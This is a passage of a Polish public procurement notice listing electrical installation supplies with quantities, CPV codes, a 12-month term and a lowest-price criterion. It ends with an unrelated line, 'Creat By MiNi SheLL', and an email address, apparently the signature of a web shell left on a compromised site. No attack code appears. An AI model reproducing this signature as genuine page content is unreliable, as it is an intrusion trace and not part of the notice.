38.	Przycisk dzwonkowy p/t - 20 szt. 
39.	Przycisk dzwonkowy n/t - 10 szt. 
40.	Wyłącznik p/t pojedynczy + ramka - 30 szt. 
41.	Wyłącznik p/t podwójny + ramka - 20 szt.
42.	Tulejka izolowana O 6mm - 200 szt.
43.	Tulejka izolowana O 4mm - 200 szt.
44.	Tulejka izolowana O 2,5mm - 200 szt.
45.	Taśma izolacyjna - 20 szt. 
46.	Ramka podwójna - 20 szt. 
47.	Cyna z kalafonią - 0,5 kg.
48.	Koszulka termokurczliwa - 4 m.
49.	Koszulka termokurczliwa - 4 m. 
50.	Koszulka termokurczliwa - 4 m. 
51.	Wkładka bezpiecznikowa - 12 szt. 
Szczegółowy opis przedmiotu zamówienia został określony w Załączniku nr 3 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.68.20.00-0, 31.68.00.00-6, 31.53.29.20-9, 31.21.13.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com